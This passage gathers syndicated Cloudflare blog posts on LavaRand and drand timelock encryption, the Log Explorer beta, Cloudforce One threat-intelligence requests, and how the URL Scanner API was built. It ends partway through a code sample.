The random bytes are then used as an input (along with the previous seed and some randomness from the system’s local entropy sources) to a Key Derivation Function (KDF) to compute a new randomness seed that is fed into a Cryptographically Secure Pseudorandom Number Generator (CSPRNG) that can produce an essentially-endless stream of unpredictable bytes upon request. The properties of a CSPRNG ensure that all outputs are practically indistinguishable from truly random outputs to anyone that does not know its internal state. LavaRand then exposes this stream of randomness via a simple internal API where clients can request fresh randomness.

seed = KDF(new image || previous seed || system randomness)
rng = CSPRNG(seed)
…
rand1 = rng.random()
rand2 = rng.random()

How can I use LavaRand?

Applications typically use secure randomness in one of two flavors: private and public.

Private randomness is used for generating passwords, cryptographic keys, user IDs, and other values that are meant to stay secret forever. As we’ve previously described, our servers periodically request fresh private randomness from LavaRand to help to update their entropy pools. Because of this, randomness from LavaRand is essentially available to the outside world! One easy way for developers to tap into private randomness from LavaRand is to use the Web Crypto API’s getRandomValues function from a Cloudflare Worker, or use one that someone has already built, like csprng.xyz (source).

Public randomness consists of unpredictable and unbiased random values that are made available to everyone once they are published, and for this reason should not be used for generateding cryptographic keys. The winning lottery numbers and the coin flip at the start of a sporting event are some examples of public random values. A double-headed coin would not be an unbiased and unpredictable source of entropy and would have drastic impacts on the sports betting world.

In addition to being unpredictable and unbiased, it’s also desirable for public randomness to be trustworthy so that consumers of the randomness are assured that the values were faithfully produced. Not many people would buy lottery tickets if they believed that the winning ticket was going to be chosen unfairly! Indeed, there are known cases of corrupt insiders subverting public randomness for personal gain, like the state lottery employee who co-opted the lottery random number generator, allowing his friends and family to win millions of dollars.

A fundamental challenge of public randomness is that one must trust the authority producing the random outputs. Trusting a well-known authority like NIST may suffice for many applications, but could be problematic for others (especially for applications where decentralization is important).

drand: distributed and verifiable public randomness

To help solve this problem of trust, Cloudflare joined forces with seven other independent and geographically distributed organizations back in 2019 to form the League of Entropy to launch a public randomness beacon using the drand (pronounced dee-rand) protocol. Each organization contributes its own unique source of randomness into the joint pool of entropy used to seed the drand network – with Cloudflare using randomness from LavaRand, of course!

While the League of Entropy started out as an experimental network, with the guidance and support from the drand team at Protocol Labs, it’s become a reliable and production-ready core Internet service, relied upon by applications ranging from distributed file storage to online gaming to timestamped proofs to timelock encryption (discussed further below). The League of Entropy has also grown, and there are now 18 organizations across four continents participating in the drand network.

The League of Entropy’s drand beacons (each of which runs with different parameters, such as how frequently random values are produced and whether the randomness is chained – more on this below) have two important properties that contribute to their trustworthiness: they are decentralized and verifiable. Decentralization ensures that one or two bad actors cannot subvert or bias the randomness beacon, and verifiability allows anyone to check that the random values are produced according to the drand protocol and with participation from a threshold (at least half, but usually more) of the participants in the drand network. Thus, with each new member, the trustworthiness and reliability of the drand network continues to increase.

We give a brief overview of how drand achieves these properties using distributed key generation and threshold signatures below, but for an in-depth dive see our previous blog post and some of the excellent posts from the drand team.

Distributed key generation and threshold signatures

During the initial setup of a drand beacon, nodes in the network run a distributed key generation (DKG) protocol based on the Pedersen commitment scheme, the result of which is that each node holds a “share” (a keypair) for a distributed group key, which remains fixed for the lifetime of the beacon. In order to do something useful with the group secret key like signing a message, at least a threshold (for example 7 out of 9) of nodes in the network must participate in constructing a BLS threshold signature. The group information for the quicknet beacon on the League of Entropy’s mainnet drand network is shown below:

curl -s https://drand.cloudflare.com/52db9ba70e0cc0f6eaf7803dd07447a1f5477735fd3f661792ba94600c84e971/info | jq
{
  "public_key": "83cf0f2896adee7eb8b5f01fcad3912212c437e0073e911fb90022d3e760183c8c4b450b6a0a6c3ac6a5776a2d1064510d1fec758c921cc22b0e17e63aaf4bcb5ed66304de9cf809bd274ca73bab4af5a6e9c76a4bc09e76eae8991ef5ece45a",
  "period": 3,
  "genesis_time": 1692803367,
  "hash": "52db9ba70e0cc0f6eaf7803dd07447a1f5477735fd3f661792ba94600c84e971",
  "groupHash": "f477d5c89f21a17c863a7f937c6a6d15859414d2be09cd448d4279af331c5d3e",
  "schemeID": "bls-unchained-g1-rfc9380",
  "metadata": {
    "beaconID": "quicknet"
  }
}

(The hex value 52db9b… in the URL above is the hash of the beacon’s configuration. Visit https://drand.cloudflare.com/chains to see all beacons supported by our mainnet drand nodes.)

The nodes in the network are configured to periodically (every 3s for quicknet) work together to produce a signature over some agreed-upon message, like the current round number and previous round signature (more on this below). Each node uses its share of the group key to produce a partial signature over the current round message, and broadcasts it to other nodes in the network. Once a node has enough partial signatures, it can aggregate them to produce a group signature for the given round.

curl -s https://drand.cloudflare.com/52db9ba70e0cc0f6eaf7803dd07447a1f5477735fd3f661792ba94600c84e971/public/13335 | jq
{
  "round": 13335,
  "randomness": "f4eb2e59448d155b1bc34337f2a4160ac5005429644ba61134779a8b8c6087b6",
  "signature": "a38ab268d58c04ce2d22b8317e4b66ecda5fa8841c7215bf7733af8dbaed6c5e7d8d60b77817294a64b891f719bc1b40"
}

The group signature for a round is the randomness (in the output above, the randomness value is simply the sha256 hash of the signature, for applications that prefer a shorter, fixed-sized output). The signature is unpredictable in advance as long as enough (at least a majority, but can be configured to be higher) of the nodes in the drand network are honest and do not collude. Further, anyone can validate the signature for a given round using the beacon’s group public key. It’s recommended that developers use the drand client libraries or CLI to perform verification on every value obtained from the beacon.

Chained vs unchained randomness

When the League of Entropy launched its first generation of drand beacons in 2019, the per-round message over which the group signature was computed included the previous round’s signature. This creates a chain of randomness rounds all the way to the first “genesis” round. Chained randomness provides some nice properties for single-source randomness beacons, and is included as a requirement in NIST’s spec for interoperable public randomness beacons.

However, back in 2022 the drand team introduced the notion of unchained randomness, where the message to be signed is predictable and doesn’t depend on any randomness from previous rounds, and showed that it provides the same security guarantees as chained randomness for the drand network (both require an honest threshold of nodes). In the implementation of unchained randomness in the quicknet, the message to be signed simply consists of the round number.

# chained randomness
signature = group_sign(round || previous_signature)

# unchained randomness
signature = group_sign(round)

Unchained randomness provides some powerful properties and usability improvements. In terms of usability, a consumer of the randomness beacon does not need to reconstruct the full chain of randomness to the genesis round to fully validate a particular round – the only information needed is the current round number and the group public key. This provides much more flexibility for clients, as they can choose how frequently they consume randomness rounds without needing to continuously follow the randomness chain.

Since the messages to be signed are known in advance (since they’re just the round number), unchained randomness also unlocks a powerful new property: timelock encryption.

Rotating double pendulums.

Timelock encryption

Timelock (or “timed-release”) encryption is a method for encrypting a message such that it cannot be decrypted until a certain amount of time has passed. Two basic approaches to timelock encryption were described by Rivest, Shamir, and Wagner:

 There are two natural approaches to implementing timed release cryptography:

  - Use “time-lock puzzles” – computational problems that cannot be solved without running a computer continuously for at least a certain amount of time.

  - Use trusted agents who promise not to reveal certain information until a specified date.

Using trusted agents has the obvious problem of ensuring that the agents are trustworthy. Secret sharing approaches can be used to alleviate this concern.

The drand network is a group of independent agents using secret sharing for trustworthiness, and the ‘certain information’ not to be revealed until a specified date sounds a lot like the per-round randomness! We describe next how timelock encryption can be implemented on top of a drand network with unchained randomness, and finish with a practical demonstration. While we don’t delve into the bilinear groups and pairings-based cryptography that make this possible, if you’re interested we encourage you to read tlock: Practical Timelock Encryption from Threshold BLS by Nicolas Gailly, Kelsey Melissaris, and Yolan Romailler.

How to timelock your secrets

First, identify the randomness round that, once revealed, will allow your timelock-encrypted message to be decrypted. An important observation is that since drand networks produce randomness at fixed intervals, each round in a drand beacon is closely tied to a specific timestamp (modulo small delays for the network to actually produce the beacon) which can be easily computed taking the beacon’s genesis timestamp and then adding the round number multiplied by the beacon’s period.

Once the round is decided upon, the properties of bilinear groups allow you to encrypt your message to some round with the drand beacon’s group public key.

ciphertext = EncryptToRound(msg, round, beacon_public_key)

After the nodes in the drand network cooperate to derive the randomness for the round (really, just the signature on the round number using the beacon’s group secret key), anyone can decrypt the ciphertext (this is where the magic of bilinear groups comes in).

random = Randomness(round)
message = Decrypt(ciphertext,random)

To make this practical, the timelocked message is actually the secret key for a symmetric scheme. This means that we encrypt the message with a symmetric key and encrypt the key with timelock, allowing for a decryption in the future.

Now, for a practical demonstration of timelock encryption, we use a tool that one of our own engineers built on top of Cloudflare Workers. The source code is publicly available if you’d like to take a look under the hood at how it works.

# 1. Create a file
echo "A message from the past to the future..." > original.txt

# 2. Get the drand round 1 minute into the future (20 rounds) 
BEACON="52db9ba70e0cc0f6eaf7803dd07447a1f5477735fd3f661792ba94600c84e971"
ROUND=$(curl "https://drand.cloudflare.com/$BEACON/public/latest" | jq ".round+20")

# 3. Encrypt and require that round number
curl -X POST --data-binary @original.txt --output encrypted.pem https://tlock-worker.crypto-team.workers.dev/encrypt/$ROUND

# 4. Try to decrypt it (and only succeed 20 rounds x 3s later)
curl -X POST --data-binary @encrypted.pem --fail --show-error https://tlock-worker.crypto-team.workers.dev/decrypt

What’s next?

We hope you’ve enjoyed revisiting the tale of LavaRand as much as we have, and are inspired to visit one of Cloudflare’s offices in the future to see the randomness displays first-hand, and to use verifiable public randomness and timelock encryption from drand in your next project.

Chaos is required by the encryption that secures the Internet. LavaRand at Cloudflare will continue to turn the chaotic beauty of our physical world into a randomness stream – even as new sources are added – for novel uses all of us explorers – just like that snail – have yet to dream up.

And she gazed at the sky, the sea, the land
The waves and the caves and the golden sand.
She gazed and gazed, amazed by it all,
And she said to the whale, “I feel so small.”

A snail on a whale.

Tune in for more news, announcements and thought-provoking discussions! Don’t miss the full Security Week hub page.

Log Explorer: monitor security events without third-party storage

Post Syndicated from Jen Sells original https://blog.cloudflare.com/log-explorer


Today, we are excited to announce beta availability of Log Explorer, which allows you to investigate your HTTP and Security Event logs directly from the Cloudflare Dashboard. Log Explorer is an extension of Security Analytics, giving you the ability to review related raw logs. You can analyze, investigate, and monitor for security attacks natively within the Cloudflare Dashboard, reducing time to resolution and overall cost of ownership by eliminating the need to forward logs to third party security analysis tools.

Background

Security Analytics enables you to analyze all of your HTTP traffic in one place, giving you the security lens you need to identify and act upon what matters most: potentially malicious traffic that has not been mitigated. Security Analytics includes built-in views such as top statistics and in-context quick filters on an intuitive page layout that enables rapid exploration and validation.

In order to power our rich analytics dashboards with fast query performance, we implemented data sampling using Adaptive Bit Rate (ABR) analytics. This is a great fit for providing high level aggregate views of the data. However, we received feedback from many Security Analytics power users that sometimes they need access to a more granular view of the data — they need logs.

Logs provide critical visibility into the operations of today’s computer systems. Engineers and SOC analysts rely on logs every day to troubleshoot issues, identify and investigate security incidents, and tune the performance, reliability, and security of their applications and infrastructure. Traditional metrics or monitoring solutions provide aggregated or statistical data that can be used to identify trends. Metrics are wonderful at identifying THAT an issue happened, but lack the detailed events to help engineers uncover WHY it happened. Engineers and SOC Analysts rely on raw log data to answer questions such as:

  • What is causing this increase in 403 errors?
  • What data was accessed by this IP address?
  • What was the user experience of this particular user’s session?

Traditionally, these engineers and analysts would stand up a collection of various monitoring tools in order to capture logs and get this visibility. With more organizations using multiple clouds, or a hybrid environment with both cloud and on-premise tools and architecture, it is crucial to have a unified platform to regain visibility into this increasingly complex environment.  As more and more companies are moving towards a cloud native architecture, we see Cloudflare’s connectivity cloud as an integral part of their performance and security strategy.

Log Explorer provides a lower cost option for storing and exploring log data within Cloudflare. Until today, we have offered the ability to export logs to expensive third party tools, and now with Log Explorer, you can quickly and easily explore your log data without leaving the Cloudflare Dashboard.

Log Explorer Features

Whether you’re a SOC Engineer investigating potential incidents, or a Compliance Officer with specific log retention requirements, Log Explorer has you covered. It stores your Cloudflare logs for an uncapped and customizable period of time, making them accessible natively within the Cloudflare Dashboard. The supported features include:

  • Searching through your HTTP Request or Security Event logs
  • Filtering based on any field and a number of standard operators
  • Switching between basic filter mode or SQL query interface
  • Selecting fields to display
  • Viewing log events in tabular format
  • Finding the HTTP request records associated with a Ray ID

Narrow in on unmitigated traffic

As a SOC analyst, your job is to monitor and respond to threats and incidents within your organization’s network. Using Security Analytics, and now with Log Explorer, you can identify anomalies and conduct a forensic investigation all in one place.

Let’s walk through an example to see this in action:

On the Security Analytics dashboard, you can see in the Insights panel that there is some traffic that has been tagged as a likely attack, but not mitigated.

Clicking the filter button narrows in on these requests for further investigation.

In the sampled logs view, you can see that most of these requests are coming from a common client IP address.

You can also see that Cloudflare has flagged all of these requests as bot traffic. With this information, you can craft a WAF rule to either block all traffic from this IP address, or block all traffic with a bot score lower than 10.

Let’s say that the Compliance Team would like to gather documentation on the scope and impact of this attack. We can dig further into the logs during this time period to see everything that this attacker attempted to access.

First, we can use Log Explorer to query HTTP requests from the suspect IP address during the time range of the spike seen in Security Analytics.

We can also review whether the attacker was able to exfiltrate data by adding the OriginResponseBytes field and updating the query to show requests with OriginResponseBytes > 0. The results show that no data was exfiltrated.

Find and investigate false positives

With access to the full logs via Log Explorer, you can now perform a search to find specific requests.

A 403 error occurs when a user’s request to a particular site is blocked. Cloudflare’s security products use things like IP reputation and WAF attack scores based on ML technologies in order to assess whether a given HTTP request is malicious. This is extremely effective, but sometimes requests are mistakenly flagged as malicious and blocked.

In these situations, we can now use Log Explorer to identify these requests and why they were blocked, and then adjust the relevant WAF rules accordingly.

Or, if you are interested in tracking down a specific request by Ray ID, an identifier given to every request that goes through Cloudflare, you can do that via Log Explorer with one query.

Note that the LIMIT clause is included in the query by default, but has no impact on RayID queries as RayID is unique and only one record would be returned when using the RayID filter field.

How we built Log Explorer

With Log Explorer, we have built a long-term, append-only log storage platform on top of Cloudflare R2. Log Explorer leverages the Delta Lake protocol, an open-source storage framework for building highly performant, ACID-compliant databases atop a cloud object store. In other words, Log Explorer combines a large and cost-effective storage system – Cloudflare R2 – with the benefits of strong consistency and high performance. Additionally, Log Explorer gives you a SQL interface to your Cloudflare logs.

Each Log Explorer dataset is stored on a per-customer level, just like Cloudflare D1, so that your data isn’t placed with that of other customers. In the future, this single-tenant storage model will give you the flexibility to create your own retention policies and decide in which regions you want to store your data.

Under the hood, the datasets for each customer are stored as Delta tables in R2 buckets. A Delta table is a storage format that organizes Apache Parquet objects into directories using Hive’s partitioning naming convention. Crucially, Delta tables pair these storage objects with an append-only, checkpointed transaction log. This design allows Log Explorer to support multiple writers with optimistic concurrency.

Many of the products Cloudflare builds are a direct result of the challenges our own team is looking to address. Log Explorer is a perfect example of this culture of dogfooding. Optimistic concurrent writes require atomic updates in the underlying object store, and as a result of our needs, R2 added a PutIfAbsent operation with strong consistency. Thanks, R2! The atomic operation sets Log Explorer apart from Delta Lake solutions based on Amazon Web Services’ S3, which incur the operational burden of using an external store for synchronizing writes.

Log Explorer is written in the Rust programming language using open-source libraries, such as delta-rs, a native Rust implementation of the Delta Lake protocol, and Apache Arrow DataFusion, a very fast, extensible query engine. At Cloudflare, Rust has emerged as a popular choice for new product development due to its safety and performance benefits.

What’s next

We know that application security logs are only part of the puzzle in understanding what’s going on in your environment. Stay tuned for future developments including tighter, more seamless integration between Analytics and Log Explorer, the addition of more datasets including Zero Trust logs, the ability to define custom retention periods, and integrated custom alerting.

Please use the feedback link to let us know how Log Explorer is working for you and what else would help make your job easier.

How to get it

We’d love to hear from you! Let us know if you are interested in joining our Beta program by completing this form and a member of our team will contact you.

Pricing will be finalized prior to a General Availability (GA) launch.

Tune in for more news, announcements and thought-provoking discussions! Don’t miss the full Security Week hub page.

Introducing Requests for Information (RFIs) and Priority Intelligence Requirements (PIRs) for threat intelligence teams

Post Syndicated from Javier Castro original https://blog.cloudflare.com/threat-intel-rfi-pir


Cloudforce One is our threat operations and research team. Its primary objective: track and disrupt threat actors targeting Cloudflare and the customer systems we protect. Cloudforce One customers can engage directly with analysts on the team to help understand and stop the specific threats targeting them.

Today, we are releasing in general availability two new tools that will help Cloudforce One customers get the best value out of the service by helping us prioritize and organize the information that matters most to them: Requests for Information (RFIs) and Priority Intelligence Requirements (PIRs). We’d also like to review how we’ve used the Cloudflare Workers and Pages platform to build our internal pipeline to not only perform investigations on behalf of our customers, but conduct our own internal investigations of the threats and attackers we track.

What are Requests for Information (RFIs)?

RFIs are designed to streamline the process of accessing critical intelligence. They provide an avenue for users to submit specific queries and requests directly into Cloudforce One’s analysis queue. Essentially, they are a well-structured way for you to tell the team what to focus their research on to best support your security posture.

Each RFI filed is routed to an analyst and treated as a targeted call for information on specific threat elements. From malware analysis to DDoS attack analysis, we have a group of seasoned threat analysts who can provide deeper insight into a wide array of attacks. Those who have found RFIs invaluable typically belong to Security Operation Centers, Incident Response Teams, and Threat Research/Intelligence teams dedicated to supporting internal investigations within an organization. This approach proves instrumental in unveiling potential vulnerabilities and enhancing the understanding of the security posture, especially when confronting complex risks.

Creating an RFI is straightforward. Through the Security Center dashboard, users can create and track their RFIs:

  1. Submission: Submit requests via Cloudforce One RFI Dashboard:
    a. Threat: The threat or campaign you would like more information on
    b. Priority: routine, high or urgent
    c. Type: Binary Analysis, Indicator Analysis, Traffic Analysis, Threat Detection Signature, Passive DNS Resolution, DDoS Attack or Vulnerability
    d. Output: Malware Analysis Report, Indicators of Compromise, or Threat Research Report
  2. Tracking: Our Threat Research team begins work and the customer can track progress (open, in progress, pending, published, complete) via the RFI Dashboard. Automated alerts are sent to the customer with each status change.
  3. Delivery: Customers can access/download the RFI response via the RFI Dashboard.
Fabricated example of the detailed view of an RFI and communication with the Cloudflare Threat Research Team

Once an RFI is submitted, teams can stay informed about the progress of their requests through automated alerts. These alerts, generated when a Cloudforce One analyst has completed the request, are delivered directly to the user’s email or to a team chat channel via a webhook.

What are Priority Intelligence Requirements (PIRs)?

Priority Intelligence Requirements (PIRs) are a structured approach to identifying intelligence gaps, formulating precise requirements, and organizing them into categories that align with Cloudforce One’s overarching goals. For example, you can create a PIR signaling to the Cloudforce One team what topic you would like more information on.

PIR dashboard with fictitious examples of priority intelligence requirements

PIRs help target your intelligence collection efforts toward the most relevant insights, enabling you to make informed decisions and strengthen your organization’s cybersecurity posture.

While PIRs currently offer a framework for prioritizing intelligence requirements, our vision extends beyond static requirements. Looking ahead, our plan is to evolve PIRs into dynamic tools that integrate real-time intelligence from Cloudforce One. Enriching PIRs by integrating them with real-time intelligence from Cloudforce One will provide immediate insights into your Cloudflare environment, facilitating a direct and meaningful connection between ongoing threat intelligence and your predefined intelligence needs.

What drives Cloudforce One?

Since our inception, Cloudforce One has been actively collaborating with our Security Incident Response Team (SIRT) and Trust and Safety (T&S) team, aiming to provide valuable insights into attacks targeting Cloudflare and counteract the misuse of Cloudflare services. Throughout these investigations, we recognized the need for a centralized platform to capture insights from Cloudflare’s unique perspective on the Internet, aggregate data, and correlate reports.

In the past, our approach would have involved deploying a frontend UI and backend API in a core data center, leveraging common services like Postgres, Redis, and a Ceph storage solution. This conventional route would have entailed managing Docker deployments, constantly upgrading hosts for vulnerabilities, and dealing with a complex environment where we must juggle secrets, external service configurations, and maintaining availability.

Instead, we welcomed being Customer Zero for Cloudflare and fully embraced Cloudflare’s Workers and Pages platforms to construct a powerful threat investigation tool, and since then, we haven’t looked back. For anyone that has used Workers in the past, much of what we have done is not revolutionary, but almost commonplace given the ease of configuring and implementing the features in Cloudflare Workers. We routinely store file data in R2, metadata in KV, and indexed data in D1. That being said, we do have a few non-standard deployments as well, further outlined below.

Altogether, our Threats Investigation architecture consists of five services, four of which are deployed at the edge with the other one deployed in our core data centers due to data dependency constraints.

  • RFIs & PIRs: This API manages our formal Cloudforce One requests and customer priorities submitted via the Cloudflare Dashboard.
  • Threats: Our UI, deployed via Pages, serves as the interface for interacting with all of our Cloudforce One services, Cloudflare internal services, and the RFIs and PIRs submitted by our customers.
  • Cases: A case management system that allows analysts to store notes, Indicators of Compromise (IOCs), malware samples, and data analytics related to an attack. The service provides live updates to all analysts viewing the case, facilitating real-time collaboration. Each case is a Durable Object that is connected to via a Websocket that stores “files” and “file content” in the Durable Object’s persistent storage. Metadata for the case is made searchable via D1.
  • Leads: A queue of informal internal and external requests that may be reviewed by Cloudforce One when doing threat hunting discovery. Lead content is stored into KV, while metadata and extracted IOCs are stored in D1.
  • Binary DB: A raw binary file warehouse for any file we come across during our investigation. Binary DB also serves as the repository for malware samples used in some of our machine learning training. Each file is stored in R2, with its associated metadata stored in KV.
Cloudforce One Threat Investigation Architecture

At the heart of our Threats ecosystem is our case management service built on Workers and Durable Objects. We were inspired to build this tool because we often had to jump into collaborative documents that were not designed to store forensic data, organize it, mark sections with Traffic Light Protocol (TLP) releasability codes, and relate analysis to existing RFIs or Leads.

Our concept of cases is straightforward — each case is a Durable Object that can accept HTTP REST API or WebSocket connections. Upon initiating a WebSocket connection, it is seamlessly incorporated into the Durable Object’s in-memory state, allowing us to instantly broadcast real-time events to all users engaged with the case. Each case comprises distinct folders, each housing a collection of files containing content, releasability information, and file metadata.

Practically, our Durable Object leverages its persistent storage with each storage key prefixed with the value type: “case”, “folder”, or “file” followed by the UUID assigned to the file. Each case value has metadata associated with the case and a list of folders that belong to the case. Each folder has the folder’s name and a list of files that belong to it.

Our internal Threats UI helps us tie together the service integrations with our threat hunting analysis. It is here we do our day-to-day work which allows us to bring our unique insights into Cloudflare attacks. Below is an example of our Case Management in action where we tracked the RedAlerts attack before we formalized our analysis into the blog.

What good is all of this if we can’t search it? The Workers AI team launched Vectorize and enabled inference on the edge, so we decided to go all in on Workers and began indexing all case files as they’re being edited so that they can be searched. As each case file is being updated in the Durable Object, the content of the file is pushed to Cloudflare Queues. This data is consumed by an indexing engine consumer that does two things: extracts and indexes indicators of compromise, and embeds the content into a vector and pushes it into Vectorize. Both of the search mechanisms also pass the reference case and file identifiers so that the case may be found upon searching.

Given how easy it is to set up Workers AI, we took the final step of implementing a full Retrieval Augmented Generation (RAG) AI to allow analysts to ask questions about our previous analysis. Each question undergoes the same process as the content that is indexed. We pull out any indicators of compromise and embed the question into a vector, so we can use both results to search our indexes and Vectorize respectively, and provide the most relevant results for the request. Lastly, we send the vector data to a text-generation model using Workers AI that then returns a response to our analysts.

Using RFIs and PIRs

Imagine submitting an RFI for “Passive DNS Resolution – IOCs” and receiving real-time updates directly within the PIR, guiding your next steps.

Our workflow ensures that the intelligence you need is not only obtained but also used optimally. This approach empowers your team to tailor your intelligence gathering, strengthening your cybersecurity strategy and security posture.

Our mission for Cloudforce One is to equip organizations with the tools they need to stay one step ahead in the rapidly changing world of cybersecurity. The addition of RFIs and PIRs marks another milestone in this journey, empowering users with enhanced threat intelligence capabilities.

Getting started

Cloudforce One customers can already see the PIR and RFI Dashboard in their Security Center, and they can also use the API if they prefer that option. Click to see more documentation about our RFI and our PIR APIs.

If you’re looking to try out the new RFI and PIR capabilities within the Security Center, contact your Cloudflare account team or fill out this form and someone will be in touch. Finally, if you’re interested in joining the Cloudflare team, check out our open job postings here.

Cloudflare’s URL Scanner, new features, and the story of how we built it

Post Syndicated from Sofia Cardita original https://blog.cloudflare.com/building-urlscanner


Today, we’re excited to talk about URL Scanner, a tool that helps everyone from security teams to everyday users to detect and safeguard against malicious websites by scanning and analyzing them. URL Scanner has executed almost a million scans since its launch last March on Cloudflare Radar, driving us to continuously innovate and enhance its capabilities. Since that time, we have introduced unlisted scans, detailed malicious verdicts, enriched search functionality, and now, integration with Security Center and an official API, all built upon the robust foundation of Cloudflare Workers, Durable Objects, and the Browser Rendering API.

Integration with the Security Center in the Cloudflare Dashboard

Security Center is the single place in the Cloudflare Dashboard to map your attack surface, identify potential security risks, and mitigate risks with a few clicks. Its users can now access the URL scanner directly from the Investigate Portal, enhancing their cybersecurity workflow. These scans will be unlisted by default, ensuring privacy while facilitating a deep dive into website security. Users will be able to see their historic scans and access the related reports when they need to, and they will benefit from automatic screenshots for multiple screen sizes, enriching the context of each scan.

Customers with Cloudflare dashboard access will enjoy higher API limits and faster response times, crucial for agile security operations. Integration with internal workflows becomes seamless, allowing for sophisticated network and user protection strategies.

Security Center in the Cloudflare Dashboard

Unlocking the potential of the URL Scanner API

The URL Scanner API is a powerful asset for developers, enabling custom scans to detect phishing or malware risks, analyze website technologies, and much more. With new features like custom HTTP headers and multi-device screenshots, developers gain a comprehensive toolkit for thorough website assessment.

Submitting a scan request

Using the API, here’s the simplest way to submit a scan request:

curl --request POST \
	--url https://api.cloudflare.com/client/v4/accounts/<accountId>/urlscanner/scan \
	--header 'Content-Type: application/json' \
--header "Authorization: Bearer <API_TOKEN>" \
	--data '{
		"url": "https://www.cloudflare.com",
	}'

New features include the option to set custom HTTP headers, like User-Agent and Authorization, request multiple target device screenshots, like mobile and desktop, as well as set the visibility level to “unlisted”. This essentially marks the scan as private and was often requested by developers who wanted to keep their investigations confidential. Public scans, on the other hand, can be found by anyone through search and are useful to share results with the wider community. You can find more details in our developer documentation.

Exploring the scan results

Scan results for www.cloudflare.com on Cloudflare Radar

Once a scan concludes, fetch the final report and the full network log. Recently added features include the `verdict` property, indicating the site’s malicious status, and the `securityViolations` section detailing CSP or SRI policy breaches — as a developer, you can also scan your own website and see our recommendations. Expect improvements on verdict accuracy over time, as this is an area we’re focusing on.

Enhanced search functionality

Developers can now search scans by hostname, a specific URL or even any URL the page connected to during the scan. This allows, for example, to search for websites that use a JavaScript library named jquery.min.js (‘?path=jquery.min.js’). Future plans include additional features like searching by IP address, ASN, and malicious website categorisation.

The URL Scanner can be used for a diverse range of applications. These include capturing a website’s evolving state over time (such as tracking changes to the front page of an online newspaper), analyzing technologies employed by a website, preemptively assessing potential risks (as when scrutinizing shortened URLs), and supporting the investigation of persistent cybersecurity threats (such as identifying affected websites hosting a malicious JavaScript file).

How we built the URL Scanner API

In recounting the process of developing the URL Scanner, we aim to showcase the potential and versatility of Cloudflare Workers as a platform. This story is more than a technical journey, but a testament to the capabilities inherent in our platform’s suite of APIs. By dogfooding our own technology, we not only demonstrate confidence in its robustness but also encourage developers to harness the same capabilities for building sophisticated applications. The URL Scanner exemplifies how Cloudflare Workers, Durable Objects, and the Browser Rendering API seamlessly integrate.

High level overview of the Cloudflare URL Scanner technology stack

As seen above, Cloudflare’s runtime infrastructure is the foundation the system runs on. Cloudflare Workers serves the public API, Durable Objects handles orchestration, R2 acts as the primary storage solution, and Queues efficiently handles batch operations, all at the edge. However, what truly enables the URL Scanner’s capabilities is the Browser Rendering API. It’s what initially allowed us to release in such a short time frame, since we didn’t have to build and manage an entire fleet of Chrome browsers from scratch. We simply request a browser, and then using the well known Puppeteer library, instruct it to fetch the webpage and process it in the way we want. This API is at the heart of the entire system.

Scanning a website

The entire process of scanning a website, can be split into 4 phases:

  1. Queue a scan
  2. Browse to the website and compile initial report
  3. Post-process: compile additional information and build final report
  4. Store final report, ready for serving and searching

In short, we create a Durable Object, the Scanner, unique to each scan, which is responsible for orchestrating the scan from start to finish. Since we want to respond immediately to the user, we save the scan to the Durable Object’s transactional Key-Value storage, and schedule an alarm so we can perform the scan asynchronously a second later.  We then respond to the user, informing them that the scan request was accepted.

When the Scanner’s alarm triggers, we enter the second phase:

There are 3 components at work in this phase, the Scanner, the Browser Pool and the Browser Controller, all Durable Objects.

In the initial release, for each new scan we would launch a brand-new browser. However, This operation would take time and was inefficient, so after review, we decided to reuse browsers across multiple scans. This is why we introduced both the Browser Pool and the Browser Controller components. The Browser Pool keeps track of what browsers we have open, when they last pinged the browser pool (so it knows they’re alive), and whether they’re free to accept a new scan. The Browser Controller is responsible for keeping the browser instance alive, once it’s launched, and orchestrating (ahem, puppeteering) the entire browsing session. Here’s a simplified version of our Browser Controller code:

export class BrowserController implements DurableObject {
	//[..]
	private async handleNewScan(url: string) {
		if (!this.browser) {
			// Launch browser: 1st request to durable object
			this.browser = await puppeteer.launch(this.env.BROWSER)
			await this.state.storage.setAlarm(Date.now() + 5 * 1000)
		}
		// Open new page and navigate to url
		const page = await this.browser.newPage()
		await page.goto(url, { waitUntil: 'networkidle2', timeout: 5000, })

		// Capture DOM
		const dom = await page.content()

		// Clean up
		await page.close()

		return {
			dom: dom,
		}
	}

	async alarm() {
		if (!this.browser) {
			return
		}
		await this.browser.version() // stop websocket connection to Chrome from going idle
		
		// ping browser pool, let it know we're alive
		
		// Keep durable object alive
		await this.state.storage.setAlarm(Date.now() + 5 * 1000)
	}
}

Launching a browser (Step 6) and maintaining a connection to it is abstracted away from us thanks to the Browser Rendering API. This API is responsible for all the infrastructure required to maintain a fleet of Chrome browsers, and led to a much quicker development and release of the URL Scanner. It also allowed us to use a well-known library, Puppeteer, to communicate with Google Chrome via the DevTools protocol.

The initial report is made up of the network log of all requests, captured in HAR (HTTP Archive) format. HAR files, essentially JSON files, provide a detailed record of all interactions between a web browser and a website. As an established standard in the industry, HAR files can be easily shared and analyzed using specialized tools. In addition to this network log, we augment our dataset with an array of other metadata, including base64-encoded screenshots which provide a snapshot of the website at the moment of the scan.

Having this data, we transition to phase 3, where the Scanner Durable Object initiates a series of interactions with a few other Cloudflare APIs in order to collect additional information, like running a phishing scanner over the web page’s Document Object Model (DOM), fetching DNS records, and extracting information about categories and Radar rank associated with the main hostname.

This process ensures that the final report is enriched with insights coming from different sources, making the URL Scanner more efficient in assessing websites. Once all the necessary information is collected, we compile the final report and store it as a JSON file within R2, Cloudflare’s object storage solution. To empower users with efficient scan searches, we use Postgres.

While the initial approach involved sending each completed scan promptly to the core API for immediate storage in Postgres, we realized that, as the rate of scans grew, a more efficient strategy would be to batch those operations, and for that, we use Worker Queues:

This allows us to better manage the write load on Postgres. We wanted scans available as soon as possible to those who requested them, but it’s ok if they’re only available in search results at a slightly later point in time (seconds to minutes, depending on load).

In short, Durable Objects together with the Browser Rendering API power the entire scanning process. Once that’s finished, the Cloudflare Worker serving the API will simply fetch it from R2 by ID. All together, Workers, Durable Objects, and R2 scale seamlessly and will allow us to grow as demand evolves.

Last but not least

While we’ve extensively covered the URL scanning workflow, we’ve yet to delve into the construction of the API worker itself. Developed with Typescript, it uses itty-router-openapi, a Javascript router with Open API 3 schema generation and validation, originally built for Radar, but that’s been improving ever since with contributions from the community. Here’s a quick example of how to set up an endpoint, with input validation built in:

import { DateOnly, OpenAPIRoute, Path, Str, OpenAPIRouter } from '@cloudflare/itty-router-openapi'

import { z } from 'zod'
